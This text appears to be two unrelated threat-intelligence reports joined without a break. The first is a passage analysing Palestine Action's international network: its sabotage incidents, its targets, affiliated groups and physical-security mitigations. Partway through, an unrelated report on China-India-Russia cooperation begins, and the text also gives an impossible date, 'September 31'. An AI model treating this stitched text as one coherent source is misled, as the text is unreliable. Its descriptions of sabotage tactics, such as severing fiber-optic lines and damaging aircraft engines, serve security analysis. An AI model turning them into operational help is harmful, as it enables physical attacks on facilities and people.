The most notable and recent sabotage incident connected to Palestine Action was the aforementioned breach of RAF Brize Norton, the largest RAF base in the UK, on June 20, 2025. A video of this attack posted by the group shows activists approaching Airbus A330s on the base using electric scooters. They damaged the aircraft by spraying red paint through a fire extinguisher directly into the plane’s engines and striking the plane with crowbars. The attack caused approximately £7 million ($9.4 million) in damages to the aircraft, almost certainly due to the impact of the attack on sensitive parts and equipment inside the planes’ engines. The attack on RAF Brize Norton led to the arrest and indictment of five Palestine Action-linked activists and almost certainly prompted the UK terrorism designation of the group, as well as improvements to facility and perimeter security at the RAF base.

Figure 6: Palestine Action activists approach aircraft at RAF Brize Norton on electric scooters (Source: Palestine Action)

Palestine Action activists also deployed sabotage TTPs on several additional operations targeting defense contractors in the UK. In August 2024, a Palestine Action cell in Bristol breached an Elbit warehouse by piloting a van through perimeter fencing, entered the facility, and began sabotaging internal equipment within the facility with sledgehammers, axes, and other blunt instruments. In total, the operation caused over £1 million ($1.3 million) in damages; protesters also allegedly assaulted a security guard and law enforcement officers responding to the incident, prompting JTAC to label the attack as an “act of terrorism.” During a June 1, 2022, incident at a Thales Group facility in Glasgow, Palestine Action activists accessed the roof and entered the facility, destroying parts used for submarines with blunt instruments. In conjunction with the sabotage operation, two protesters glued themselves to the roof, likely attempting to obstruct access to the facility.

Targets

Palestine Action’s primary target in the UK has almost certainly been Elbit: the global defense contractor has been the most frequent victim of its attacks, the group’s propaganda and instructional material list Elbit as the group’s preferred target, and Palestine Action has launched branded campaigns designed specifically to encourage activists to attack Elbit facilities. As secondary targets, the group has conducted notable attacks against other public and private sector defense entities perceived to have some association with the Israeli military, namely the UK’s Ministry of Defence (MoD), Teledyne Technologies, Thales Group, Leonardo, and Rafael Advanced Defense Systems. According to its 2023 announcement and its post-October 7, 2023, activity, the group and its international network consider a range of entities in sectors that reportedly supply goods or services to Elbit or the Israeli military — including banks, financial institutions, insurance agencies, real estate brokers, accounting firms, human resources contractors, and international shipping and logistics companies — as legitimate targets for militant direct action. Direct actions have also targeted other UK government entities, including the UK Foreign and Commonwealth Office, the BBC, and the London Stock Exchange. Palestine Action almost certainly targets these companies with the goal of inflicting maximum financial and reputational damage through its operations, in order to convince companies to cease their business with Elbit or Israeli entities.

As the next section demonstrates, the international expansion of Palestine Action network groups adopting the UK branch’s modus operandi or TTPs has almost certainly broadened the range of secondary and tertiary targets that are likely to be affected by militant direct action campaigns. However, Palestine Action and its global network very likely share a focus on specific sectors — defense contracting, banking, insurance, and international shipping and logistics — that relevant groups and cells are likely to target regardless of their respective area of operations. Moreover, the TTPs Insikt Group associates with Palestine Action’s UK branch have almost certainly been adopted by its international counterparts, very likely due to the influence of Palestine Action’s militant direct action campaigns in the UK, instructional material, and training sessions for activists.

Palestine Action’s Global Network

Palestine Action’s global network consists of groups of activists around the world who share Palestine Action UK’s commitment to disrupting the normal business operations of entities partnered with the State of Israel through militant direct action. Some of these groups refer or have referred to themselves explicitly as “Palestine Action”; have direct relationships to the UK branch through their members, partners, or benefactors; choose identical targets, such as Elbit; or, like Palestine Action UK, are solely motivated by the anti-Israel cause. Others, despite lacking these relationships, have directly appropriated Palestine Action UK’s TTPs, targets, or other aspects of the organization to support their own operations.

We classify groups in Palestine Action’s global network based on which elements they share in common with the UK branch. As depicted in Table 1, our four-part classification labels Palestine Action network groups as either Palestine Action franchises, affiliates, offshoots, or partners, depending on whether they share areas of operation, motivating ideology, TTPs, or targets with the UK branch. These categories are not static and are subject to change over time, particularly as groups founded as Palestine Action franchises outside the UK adapt to the local landscape in their own countries and form their own brand. Table 1 additionally contains examples of each of the four categories of Palestine Action network groups, with the following subsections containing case studies of particularly notable franchise, affiliate, offshoot, and partner groups.

Table 1: Classification of Palestine Action global network groups (Source: Insikt Group)

Franchise: Palestine Action Italia/Palestina Libera (Italy)

Figure 7: Palestine Action Italia logo (Source: Palestine Action Italia)

Palestine Action Italia, more commonly known as Palestina Libera, is Palestine Action’s Italy-based franchise. On its website, the group directly identifies itself as “the Italian branch of the international ‘Palestine Action’ campaign, which in England directly led to the closure of three arms factories involved in the genocide in Gaza.” The group also uses similar branding as the UK branch, employs similar TTPs, and targets the same sectors, focusing largely on defense contractors with facilities in Italy. In particular, Palestina Libera’s direct actions have frequently targeted the Italy-based defense contractor Leonardo at its offices throughout the country, due to its joint ventures with Elbit.

The organization very likely emerged from pro-Palestinian activist factions in Italy that increasingly aligned with Palestine Action’s global network in the wake of the October 7, 2023, attack. While data in the Recorded Future Platform indicates the group’s website was registered on February 4, 2024, a 2008 issue of al-Majdal Magazine — the quarterly publication of the BADIL Resource Center for Palestinian Residency & Refugee Rights — indicates that the same domain was operated by an Italian pro-Palestinian organization, the Comitato di Solidarietà con il Popolo Palestinese, Torino [Committee for Solidarity with the Palestinian People in Turin, Italy]. Screenshots of the domain captured in the Wayback Machine indicate that between October 2010 and the website’s registration in February 2024, the site displayed a message indicating the administrator should “upload [their] website into the public_html directory.” This message almost certainly indicates that an administrator account was active during the interim, but that it had not uploaded any information onto the domain. The group’s active social media accounts were created in November and December 2023, respectively.

Following Palestine Action’s July 5, 2025, designation as a terrorist organization in the UK, Palestine Action Italia has likely become one of the organization’s most prioritized franchises. Palestine Action’s main website currently includes a link to donate to Palestina Libera, hosted on Palestina Libera’s website. This donation section uses the service provider Donorbox to facilitate transactions, with options for donors including sending €15 for “a little bit of paint,” €50 for “smoke bombs in action,” €100 for the “legal expenses fund,” or another amount determined by the donor. Palestina Libera has also very likely increased its operational tempo in the wake of the proscription, citing Palestine Action UK’s designation and the arrests of protesters at rallies in the UK as motivation for new direct actions. For instance:

• On October 3, 2025, Palestina Libera took part in pro-Palestine direct actions across Italy, protesting the Israeli government’s interception of the Global Sumud Flotilla. Activists very likely affiliated with Palestina Libera participated in occupations and blockades of major transportation and logistics infrastructure, including obstructing a runway at Pisa International Airport, occupying several highways in the Tuscany region, and blockading an Amazon Logistics facility in Brandizzo.
• On September 29, 2025, the group claimed to have blockaded a Leonardo facility in the town of Nerviano. In a social media post, it alleged that at least one Leonardo employee working at the facility joined its protest.
• On September 25, 2025, several of the group’s activists chained themselves together outside a Rheinmetall facility in Rome, which they claimed “hindered production” and “made the gate inaccessible for an entire work shift.”

Affiliate: Death to Toll (Australia)

Figure 8: Death to Toll logo (Source: Instagram)

“Death to Toll” is a campaign by anarchist violent extremists (AVEs) in Australia to conduct vandalism, obstruction, and sabotage against the Australian international logistics and shipping company Toll Group (Toll), its parent organization Japan Post Holdings, and defense contractors working with the Australian Defense Force (ADF), due to accusations that Toll and the ADF are partnering with the Israeli military. The group responsible for this campaign is classified as a Palestine Action affiliate, as it almost certainly shares Palestine Action UK’s ideology and uses TTPs promoted by the group, but operates solely in the Melbourne, Australia area and has chosen its own companies to target.

The first attack claimed by this group was a sabotage of a Heat Treatment Australia (HTA) facility on October 14, 2024; the campaign against Toll began with an obstruction of one of the company’s facilities in Melbourne on November 22, 2024. In an August 7, 2025, interview, Death to Toll’s organizers cited Palestine Action’s targeting of UK shipping organizations that partnered with Elbit as an inspiration for their attacks. They also have shared a copy of Palestine Action’s 2023 instructional guide on their website.

In recent months, the Death to Toll group has claimed responsibility for several acts of vandalism, obstruction, and sabotage targeting Toll:

• On October 7, 2025, AVEs claimed responsibility for intercepting a Toll fuel truck in Melbourne by obstructing a road with flaming objects. They subsequently spraypainted the truck with red graffiti.
• On August 31, 2025, AVEs claimed to have attacked a Toll facility in Dandenong South. A video posted to the group’s Instagram account shows activists smashing exterior glass doors of the facility with a blunt object and dousing them with a flammable liquid in a bottle, very likely gasoline.
• On August 11, 2025, AVEs claimed to have vandalized a Toll facility in Truganina, writing graffiti, spraying red paint, and damaging keycard access devices on the exterior of the facility. Toll confirmed the attack in a statement to the press, and Victoria Police indicated they were investigating the incident.

Beyond its website, the Death to Toll campaign operates a social media account and accepts submissions from independent AVEs for claims of responsibility and tips on potentially vulnerable facilities on a Mega file-sharing site and through a Proton Mail email address. The social media pages attributed to the group have frequently used the hashtags #socalledaustralia, #DeathToll, and #TheDeathTollisRising. On the front page of their website, the administrators have posted a call to action against industries in Australia that they perceive to be providing support for the IDF. Specifically, they claim that “all sites and equipment used or owned by Toll Holdings and its parent company, Japan Post, are legitimate targets for anti-genocide action. This includes sabotage, vandalism, blockades, strikes, occupations, and all forms of resistance and disruption. Everything is on the table.”

Offshoot: Unity of Fields (United States)

Figure 9: Unity of Fields logo (Source: Social Media)

Unity of Fields (UoF) describes itself as an “anti-imperialist propaganda front” that reports on the activities of militant pro-Palestinian activists in the US. In this regard, it functions in a similar fashion to AVE “counter-info” outlets, which provide AVEs in a specified geographic area with information pertaining to upcoming protests and demonstrations, claims of responsibility for AVE attacks, guides and instructional material for carrying out attacks, and communiqués from local AVE groups.

UoF was almost certainly founded as a Palestine Action franchise in the US: during its initial years of operation, it used the name “Palestine Action US,” was managed by a cell of activists who almost certainly founded the group with insight from Palestine Action UK members, and devoted itself to attacking Elbit facilities in the US using Palestine Action’s standard TTPs.

From October 7, 2023, to August 2024, Palestine Action US predominantly conducted vandalism, obstruction, and sabotage against Elbit facilities, particularly in Cambridge, Massachusetts, and Merrimack, New Hampshire. Calla Walsh — almost certainly one of Palestine Action US and UoF’s de facto leaders between October 2023 and July 2025 — was arrested and convicted for her role in a November 20, 2023, Palestine Action US attack on an Elbit facility in Merrimack.

In August 2024, following Walsh’s release from prison, Palestine Action US announced its rebranding as “Unity of Fields”, appropriating a concept from the Yemeni Houthi movement. The group subsequently renamed its social media and online messenger accounts, launched a new website dedicated to the group’s communiqués and instructional materials, and claimed the group’s new mission was to establish “a militant propaganda front against the US-NATO-zionist axis of imperialism.” In addition to claims of responsibility for attacks, the website also hosts a repository of instructional and ideological material, as well as publications produced by other AVE groups.

Autonomous pro-Palestinian activists across the US have sent several dozen claims of responsibility to UoF for publication claiming responsibility for operations against an array of targets, including defense contractors (including Magellan Aerospace, Rolls-Royce and MTU America, Lockheed Martin, Ghost Robotics Corporation, Leidos, and Israel Chemicals), banks (including Bank of America, Citibank, Wells Fargo, Chase Bank, and BNY Mellon), shipping and logistics companies (including Maersk and Amazon), US military recruitment centers, law enforcement infrastructure (particularly vehicles), university buildings and officials, public transportation, and construction buildings and equipment. Occasionally, DVEs from outside of the US — including other Palestine Action global network groups — send communiqués to UoF for publication. At the time of writing, the most recent claims of responsibility include:

• An August 7, 2025, communiqué claiming responsibility for an arson of several vehicles at a Lovitt Technologies plant in Melbourne, Australia
• A May 29, 2025, communiqué claiming responsibility for spraypainting several pro-Palestinian messages on a Maersk shipping container in Oakland, California
• A May 9, 2025, communiqué from protesters at the University of Washington that details the occupation of a university building

UoF has significantly decreased its output of new claims of responsibility since late July 2025, very likely because of internal disputes and a leadership transition within the group. On July 29, 2025, Calla Walsh reported on social media that she was “no longer part of” UoF after a dispute over the “direction in which the project is going,” following which Walsh reported “the organization purged me” and that she had “complied with the decision and transferred them ownership of the accounts.” While Insikt Group is unaware of the exact nature of this dispute, Walsh’s departure from UoF directly followed a July 2025 trip she made to Iran, where she participated in an event hosted by the World Service of the Islamic Republic of Iran Broadcasting (IRIB), Iran’s government-operated media agency. In an October 5, 2025, article on her Substack page, Walsh reported that she had been detained by US Customs and Border Protection (CBP) officers at New York’s John F. Kennedy International Airport following her return from Tehran.

Partner: Shut the System (United Kingdom)

Figure 10: Shut the System logo (Source: Social Media)

Unlike other groups included in this report, which are predominantly motivated by the Palestinian cause, Shut the System is a UK-based environmental violent extremist (EVE) group that likely emerged as an offshoot of the UK climate activist group Extinction Rebellion (XR). However, the group has also almost certainly conducted pro-Palestinian direct actions. In addition, Shut the System has also directly collaborated with Palestine Action in the UK, almost certainly due to substantial overlaps between Palestine Action’s and Shut the System’s TTPs, preferred targets, and areas of operation. For instance, Shut the System frequently targets insurers and banks that it claims provide services to major global fossil fuel extraction projects; Palestine Action has also targeted many of the same companies on the grounds that they provide services to the IDF or Israeli government. Both groups also frequently use vandalism with red paint, projectiles, or blunt objects to deface the facade of target properties, as well as sabotage, although Shut the System has very likely deployed more sophisticated methods of infrastructure sabotage than Palestine Action. Overall, Shut the System fits the profile of a Palestine Action partner organization.

The first reported Shut the System operation took place in late February 2024. During 2024, the group predominantly conducted vandalism targeting the London offices of insurance companies, such as AIG, Probitas 1492, Chubb, Liberty General, Lloyd’s of London, Markel UK, QBE, Tokio Marine, as well as Barclays, using red paint, graffiti, and projectiles. In a January 2025 communiqué, Shut the System claims to have selected these companies as targets because they were identified in a November 2023 article from Insurance Business Magazine as among the top ten insurers of fossil fuel extraction projects in the world. On June 10, 2024, Shut the System and Palestine Action conducted a joint, UK-wide operation targeting Barclays bank branches in Birmingham, Bristol, Brighton, Edinburgh, Exeter, Glasgow, Lancashire, London, Manchester, Northampton, Sheffield, and Solihull. Activists from both groups sprayed red paint on the exterior of the branch facilities and smashed their windows with projectiles.

Subsequently, the group has very likely expanded its targeting aperture to include conservative think tanks, additional financial services providers, and events for defense contractors, posting claims of responsibility for attacks on its websites and social media profiles. Shut the System’s website also contains instructions on how to conduct vandalism, obstruction, and sabotage on behalf of the group, and provides a list of 38 banks and insurance companies that it identifies as priority targets due to their alleged financing of the fossil fuel industry. The group continues to conduct joint operations with a number of UK-based AVE and EVE cells, including cells affiliated with almost certain Palestine Action offshoot groups. For instance, during the past several months, Shut the System claims to have collaborated with pro-Palestinian militant direct action groups during the following operations:

• On October 8, 2025, Shut the System’s “Palestine solidarity faction” and activists from the UK group Palestine Pulse claimed to have used projectiles and blunt instruments to destroy “entrances, glass panels, security cameras and ID card readers” at a Palantir Technologies facility in London. They additionally claimed to have sprayed red paint on the building’s facade.
• On September 29, 2025, Shut the System claimed to have conducted a joint operation with Shut Elbit Down and French and German XR affiliate groups to target Barclays and BlackRock assets throughout the UK and Europe. Activists sprayed red paint outside of Barclays offices in Paris, France, and Hamburg, Germany, and a BlackRock office in Vienna, Austria, and “superglued locks of [Barclays] branches across the UK.” Additionally, Shut the System stated it targeted two Barclays senior executives in the UK by spraying red paint outside of their personal residences, and sending letters to the executives’ neighbors “inviting them to a cocktail party hosted by the [executive] where they can explain why they have no conscience.”
• On September 8, 2025, Shut the System claimed to have severed fiber-optic cables leading to the London offices of Clarion Events, the company responsible for hosting the Defence and Security Equipment International (DSEI) defense trade exhibition. It conducted the action as part of a campaign, “Shut DSEI Down,” that aimed to protest the trade exhibition due to the participation of several defense contractors that pro-Palestinian activists argue provide armaments to the IDF.

From January 2025 onward, Shut the System frequently used a physical attack TTP that we have not observed in the operations of other Palestine Action global network groups, namely, sabotaging communications infrastructure by cutting fiber optics lines. Instructions on Shut the System’s website demonstrate how to identify fiber optic cable boxes outside of target facilities, locate the correct wires, and sever them to disrupt internet and other communications services to the building. Between August 18 and September 31, 2025, Shut the System launched a campaign titled “Summer of Sabotage” in which it encourages activists to use these and other sabotage TTPs to target banks and financial industry entities.

Mitigations

The decentralized nature of individual Palestine Action cells entails that activists very likely plan operations in closed or encrypted communications channels that are almost certainly inaccessible to individuals who have not established their bona fides with the group. The groups’ official communications announce operations after the fact; they almost certainly will not provide indicators and warnings (I&W) of planned activities.

To diminish risks from physical threat activities conducted by Palestine Action’s global network, organizations and their physical security teams should focus on mitigating the effects of attacks by implementing the following approaches. Overall, physical security measures should aim to deny Palestine Action operatives interior access to facilities. The most costly attacks perpetrated by the group — including the June 2025 attack on RAF Brize Norton — took place after activists were able to breach secure perimeters, enter facilities, and sabotage assets stored inside perimeters.

• Recorded Future customers can leverage the Recorded Future Intelligence Operations Platform to monitor communications sources connected to Palestine Action and its global network, in order to determine evolutions in trends in targeting and TTPs and an organization’s overall risk level.
• Customers can use the Recorded Future Platform’s Intelligence Cards, Advanced Query Builder, and Insikt Group reporting to track ongoing global events — such as the Israel-Hamas conflict or the status of Palestine Action’s legal battle against its terrorism designation in the UK — that are likely to affect threat actors’ operational tempo and targeting aperture.
• Integrate this report and other Insikt Group assessments of DVE threat actors’ TTP and targeting into structured tabletop exercises for physical security teams.
• Review and, where necessary, implement governmental guidelines for physical protection of business facilities, particularly with regard to electronic surveillance, secure lighting, and security personnel.
• Conduct vulnerability assessments to enable effective contingency and resiliency planning in the event of an incident of vandalism, obstruction, or sabotage, with particular focus on a successful incident disrupting communications, transportation, and energy infrastructure.
• Limit voluntary publication of information about the functions, layout, and location of critical infrastructure assets at facilities, or security measures at a facility, beyond the levels necessary to comply with legal or regulatory requirements.

Outlook

While Palestine Action’s branch in the UK continues the ongoing legal appeal of its terrorism designation — very likely until the designation is rescinded or all of its legal options are exhausted — Palestine Action’s global network is very likely to escalate the frequency and scope of its militant direct action operations. In the short to medium term, the formation of new Palestine Action global network groups in North America, Western Europe, Australia, and elsewhere around the world is likely, threatening an increased range of organizations in defense contracting, banking, finance, insurance, and shipping and logistics sectors.

Extant groups linked to Palestine Action are also likely to traverse the various categories of groups described in this report, with cells inside the UK attempting to separate themselves from the Palestine Action brand to avoid legal scrutiny and cells outside the UK highlighting their connections to Palestine Action to build credibility with AVEs and the pro-Palestine activist movement. As such, we expect existing franchises and affiliates in the UK to increasingly become offshoots and partners while the ban is in effect; the reverse is likely in geographic areas outside the UK where Palestine Action is not a designated terrorist organization.

Volatile dynamics in the Israel-Hamas conflict and the situation in the Gaza Strip are also very likely to influence Palestine Action’s global network in the short to medium term, especially with regard to the frequency of attacks. At the time of writing, a ceasefire between Israel and Hamas, effective October 10, 2025, remains in effect. While the establishment of the ceasefire likely did not stop Palestine Action network groups from conducting operations — several of the groups profiled in this report have carried out attacks in the interim — any potential breakdown in the ceasefire would very likely augur increased Israeli military activity in the Gaza Strip that has historically caused upticks in attacks related to the network.

Executive Summary

Insikt Group assesses that the August 2025 meeting of Chinese Communist Party (CCP) General Secretary Xi Jinping, Indian Prime Minister Narendra Modi, and Russian President Vladimir Putin at the Shanghai Cooperation Organization (SCO) Summit likely suggests early interest among the three states to explore trilateral cooperation, though the formation of a resilient bloc remains unlikely.

United States (US) policy –– particularly the level of sanctions the US places on each country –– is likely one of the primary factors driving the three states to change their level of cooperation. An increase in US sanctions is likely to drive each state to pursue alternative markets; this motivation has led to an acceleration of trilateral cooperation in some areas, and a reduction in others. For example, President Donald Trump’s decision to impose tariffs on India in mid-2025 very likely amplified a warming China-India relationship and reinforced a stable India-Russia relationship. In contrast, US sanctions on Russian oil companies in October 2025 led China and India to decrease their level of Russian oil imports.

The second factor driving Russia, India, and China to explore trilateral cooperation is very likely their shared strategic interest in a multipolar global order — manifest through fora like SCO and BRICS (Brazil, Russia, India, China, and South Africa).

However, despite nascent trilateral cooperation, there remains significant divergence among the three countries’ foreign policy goals, governing principles, and economic ambitions, which likely limits the scope of their cooperation. The political, economic, and military dynamics that shape bilateral relationships between China-Russia, China-India, and India-Russia are complex and distinct. Of those relationships, challenges between Beijing and New Delhi are almost certainly the greatest barrier to the formation of a trilateral bloc or alliance. In particular, India’s competition with China for Asia-Pacific regional leadership and influence, a large trade deficit favoring China, and unresolved border disputes will very likely temper the depth of cooperation between the two. All three countries seek to create an alternative center of gravity to the West, but India does not share Russia’s or China’s staunchly anti-Western worldview.

Although BRICS and SCO almost certainly represent viable opportunities for the three countries to foster trilateral cooperation, significant limitations prevent deeper alignment within these fora. The Russia-India-China (RIC) dialogue format, if rejuvenated, would offer the most likely format to formalize trilateral alignment. Insikt Group identified a range of potential indicators that are likely to reflect a coalescence into a political, economic, or military bloc.

Deepening trilateral coordination would almost certainly have broad implications for both the public and private sectors, depending on the depth and intensity of the cooperation. For example, the formation of trilateral economic frameworks, such as lower trade barriers or coordinated regulatory schemes, would force private sector companies operating in any of these countries to adapt to new regulatory standards and potentially face increased competition from an enlarged trilateral economic market. Deeper defense cooperation could lead to shifts in the defense industry of each country, as markets adjust to serve the defense needs of each member of the trilateral. If this leads Chinese and Indian defense industries to increasingly look to serve Russian defense needs, it could force companies that currently produce dual-use technologies for China and India to make adjustments to avoid transacting with sanctioned Russian defense entities.

Key Findings

• The single greatest impediment to trilateral cooperation is very likely the deep distrust between China and India, which underpins political, economic, and military competition — including a decades-long border dispute. India’s doctrine of strategic autonomy and its pursuit of “multi-alignment” are likely to limit its willingness to join a formal trilateral bloc with China and Russia that is explicitly positioned as a counterweight to the West.
• However, all three states very likely share a desire for a multipolar world that includes more developed regional centers of power. This likely helps drive trilateral cooperation to avoid US influence that threatens the strategic interests of Russia, China, and India.
• The nearly decade-long strategic partnership between Moscow and Beijing is likely a key factor driving trilateral cooperation, as Russia and China have shared experience developing alternative centers of power to the West. Both states are likely motivated to convince India to adopt a similar strategy.
• An increase in US sanctions and tariffs is very likely to be a primary factor driving greater trilateral cooperation, as all three states seek alternative markets and China and India likely aim to avoid secondary sanctions. In contrast, Western government policies that facilitate China’s and India’s access to Western markets are likely to lessen Beijing’s and New Delhi’s incentive to deepen trilateral economic cooperation.
• Deepened trilateral economic cooperation very likely would increase the prospect that Western companies — especially those operating in India — see heavier state involvement in the private sector and greater Western scrutiny of Indian economic transactions to catch sanctions violations, as New Delhi aligns its practices with Moscow and Beijing.

Background: US Policy Likely Driving Nascent Cooperation Among China, India, and Russia

We assess that there are early signs of cooperation among India, China, and Russia in recent months and that this cooperation is likely to expand, driven primarily by an emerging thaw in China-India relations. Against the backdrop of strong India-Russia and China-Russia relations, this warming of China-India relations likely increases the prospect of a deeper trilateral relationship. However, a formal China-India-Russia bloc has not yet formed, and significant limitations –– particularly around Beijing-New Delhi tensions –– are likely to challenge such an alignment.

India has likely calculated that the US’s 50% tariff on Indian exports –– imposed on India in August 2025, comprising a 25% reciprocal tariff and a 25% “penalty” tariff due to India purchasing sanctioned Russian oil –– necessitates looking for alternative markets and deepening foreign partnerships to recoup lost revenue and reinforce relationships India likely views as more reliable, including cultivating its relationship with Beijing. On August 6, 2025, one day before the US imposed a 50% tariff on Indian exports to the US, the Indian Ministry of External Affairs called the US’s decision “unfair” and “unjustified” and vowed that India would “take all actions necessary to protect its national interests.” India has specifically highlighted the inconsistency in the US’s application of a penalty tariff on India for importing Russian oil, while other countries, “even those with more adversarial relations with Russia,” have also sourced oil from Russia. China’s increasing oil imports from Russia likely reinforced to New Delhi that the US’s tariff policy was unjust. Indian officials are reportedly monitoring the US Supreme Court case (challenging the Trump administration’s tariffs) to determine its impact on current US-India trade negotiations. A breakthrough in trade talks would likely improve, but not entirely repair, the deteriorating diplomatic and economic ties between India and the US.

The US tariffs have likely also reinforced an emergent reconciliation between India and China. In August 2025, Chinese Foreign Minister Wang Yi visited New Delhi for the first time in three years. Beijing likely sees economic and political benefit to deepening ties with India, including exploiting the Indian market for Chinese exports and curbing US influence in South Asia. China’s trade surplus with India and status as the top exporter of electronics, telecommunications, and machinery to India likely give Beijing economic leverage in negotiations with India, particularly as India looks to recoup revenue lost due to US tariffs.

Following Modi’s August 31, 2025, meeting with Xi –– Modi’s first visit to China in seven years, at the SCO Summit in Tianjin –– Modi stated that “a stable relationship and cooperation” between China and India was critical for “the growth and development of the two countries, as well as for a multipolar Asia befitting the trends of the 21st century.” Amid India’s stated frustration over US tariffs, the highly publicized friendly interaction between Modi, Xi, and Putin (Figure 1) at the SCO Summit sparked concerns over an emergent Russia-India-China troika.

Figure 1: Photo posted by Modi of himself with Putin and Xi at the SCO Summit

on August 31, 2025 (Source: Social Media)

The nascent warming of China-India relations likely makes deeper trilateral cooperation among China, India, and Russia more probable, as China and Russia, as well as India and Russia, already have strong relations. Thus, a warming China-India relationship ameliorates the biggest barrier to the formation of a trilateral dynamic. In addition, all three states likely see political and economic benefits to deepening cooperation.

Areas of Bilateral Intersection and Divergence Among China, India, and Russia

Deepening trilateral cooperation among China, India, and Russia likely serves the strategic foreign policy interests of each state, though the trajectory of any fully formed trilateral dynamic is likely to be shaped by nuanced differences among each state’s foreign policy, as well as the bilateral dynamics within this group.

China’s Foreign Policy

China’s foreign policy toward Russia and India is almost certainly an outgrowth of the country’s primary strategic objectives. These include China’s “core interests,” such as preserving the CCP’s political power, territorial integrity, and economic development, as well as China’s efforts to shape a “multipolar” world, which almost certainly entails independence from US coercion, an increase in China’s international influence, and greater global dependence on China. China very likely sees greater cooperation with Russia and India as supporting these goals, especially in relation to Beijing’s main perceived threat — the US. In particular, China almost certainly considers Russia a political, economic, and military partner that helps legitimize China’s narratives about the need for multipolarity and bolster its ability to defend itself from US coercion. China likely considers India an important economic partner and judges that frayed India-US relations diminish the US’s efforts to encircle and contain China.

India’s Foreign Policy

India almost certainly defines its relationships with China and Russia through its doctrine of “strategic autonomy,” in which New Delhi avoids binding security alliances, instead maintaining flexibility in its relationships with global powers while cultivating influence across the developing world. Shaped by its role in founding the Non-Aligned Movement during the Cold War, New Delhi’s engagement with Beijing and Moscow has been a pragmatic balancing act seeking to promote an increasingly multipolar world order while simultaneously fostering ties with the US. India’s approach to China and Russia is also underpinned by a “multi-alignment” policy, which very likely seeks to promote and safeguard India’s core national interests, including economic growth, national security, territorial integrity, regional stability, and global cooperation. Consistent with its strategic independence, New Delhi has cultivated its role as a “neutral centrepiece” between China and the West while avoiding overt alignment with, or opposition to, any particular state.

Russia’s Foreign Policy

Moscow very likely views its relationships with China and India as beneficial to its core foreign policy goal of enhancing Russia’s global influence by replacing what Moscow sees as a US-centric global system with a multipolar world in which Russia is on equal footing with the US and China. This goal has almost certainly driven Moscow to place increased importance on relationships with non-Western powers, including China and India. Russia’s latest Foreign Policy Doctrine describes this goal as follows:

Russia also sees value in expanding economic cooperation with China and India, as Moscow seeks to replace revenue lost due to Western sanctions. The sanctions that the EU and the US have placed on Russia for its annexation of Crimea in 2014 and full-scale invasion of Ukraine in 2022 have made Russia the most sanctioned state in the world.

China-Russia: Strategic Partners in Countering the West

In recent years, China and Russia have become critical strategic partners, with diplomatic, military, economic, and technological engagement deepening. Although tensions almost certainly exist, particularly in their respective intelligence services, close leader relations and convergence on strategic foreign policy objectives –– particularly pushing back against perceived Western hegemony –– means these low-level tensions are unlikely to undermine China and Russia’s overall cooperative trajectory.

Political Dynamics

Chinese and Russian leadership almost certainly see each other as primary strategic partners in advancing the “multipolar” world. In 2023, Xi said to Putin, “We are the ones driving” changes unseen in a century, and multiple joint statements have noted this goal. Moscow likely views China as having the ability to leverage its significant economic and political influence to amplify Russia’s goal of ushering in a multipolar world with Russia, the US, and China on equal footing. Russia is an advocate for, or a participant in, many of China’s global governance and development initiatives that relate to its goals for a “multipolar” world, including the Global Governance Initiative, Global Security Initiative, and Global Development Initiative.

Putin and Xi very likely have a close political relationship, judging from their official statements and the frequency of their visits. Xi and Putin have met over 40 times since 2012 — more frequently than either has met with any other leader. In February 2022, China and Russia declared a “no limits partnership,” and in May 2025, Putin stated that “The comprehensive partnership and strategic cooperation between Russia and China are built on the unshakable principles of equality, mutual support and assistance, as well as the unbreakable friendship between the two states and two nations.” China and Russia’s political alignment has extended to supporting one another at international institutions. For example, they have used their veto powers on the UN Security Council (UNSC) to support one another’s interests, often vetoing resolutions that the other opposes.

Although Putin and Xi have a close leader-level relationship and there is significant compatibility between Russia’s and China’s goals of increasing their respective global influence at the US’s expense, mistrust almost certainly exists at lower bureaucratic levels. Their voting alignment in the UN General Assembly and UNSC has decreased by roughly 10% since 2018. Though China has an officially neutral, though in practice somewhat pro-Russia, position on the war in Ukraine, the war very likely has had some negative effects on China, including potential trade disruptions and sanctions (1, 2, 3). Nevertheless, China’s foreign minister reportedly made statements to European Union (EU) officials in July 2025 that conveyed that China, while not supporting Russia militarily, prefers a protracted conflict in Ukraine as it diverts the US’s focus away from China.

At least some Russian intelligence officers very likely view China with suspicion, based on a leaked document prepared by the Federal Security Service’s (FSB) Department of Counterintelligence Operations (DKRO) describing China as a significant espionage threat to Russia. Insikt Group lacks context as to the origin and veracity of this memo and whether it reflects unusual levels of concern about Chinese espionage, or simply a recognition by the FSB that Chinese intelligence services –– which are highly capable and aggressive –– are likely to spy on all states, regardless of the level of political cooperation. Even if the memo reflects a concern by the FSB that Chinese espionage might go beyond typical intelligence operations, Putin’s significant control over the Russian bureaucratic apparatus means any misgivings about China among FSB officers are almost certain not to impact the overall China-Russia dynamic.

Economic Dynamics

Russia very likely views economic cooperation with China as a means to solidify its overall relationship with Beijing and make up for revenue lost from Western sanctions, as noted above. China likely views its economic relationship with Russia primarily as a means to achieve the political objectives described above, although China likely also benefits from technological partnership and the opportunity to expand trade denominated in Chinese yuan.

China has purchased increasingly more Russian oil and gas since Western sanctions went into effect following Russia’s annexation of Crimea in February 2014, diminishing Russia’s ability to sell oil and gas to Western markets. Since Russia invaded Ukraine in 2022, China’s import of Russian oil and natural gas has substantially increased. On September 2, 2025, Russia and China signed a legally binding deal to build the long-delayed Power of Siberia 2 pipeline, which will supply 50 billion cubic meters of gas per year. As of 2023, Russia was China’s top crude oil supplier, and China buys Russian crude oil at a price that is above the G7/EU price cap, further contributing to China’s role in providing Russia with sanctions relief. However, Chinese companies are likely wary of sanction penalties, as seen in reportedly cancelled orders of Russian oil imports following US sanctions in late October 2025.

In addition to supporting Russia through increased purchase of Russian oil and gas, Beijing has long allowed –– if not encouraged –– the export of dual-use and military-relevant goods and expertise. As of mid-2025, dual-use exports to Russia likely have at least slightly decreased from their peak in 2024.

Overall trade between China and Russia has also grown significantly since 2014, and particularly since Russia’s full-scale invasion of Ukraine in February 2022. In 2024, total trade reached $245 billion, nearly double that of 2020. The trade balance has been relatively even, with a slight Russian surplus. Russia’s exports to China have mainly consisted of fossil fuels and natural resources, while China’s exports to Russia are primarily manufactured goods such as automobiles, tractors, and electronics. Infrastructure projects –– such as new border crossings –– have helped support increased trade. Technology-oriented research partnerships between Chinese and Russian universities are also expanding, and China and Russia have announced deepening ties for research into information and communication technologies like artificial intelligence and the Internet of Things (IoT).

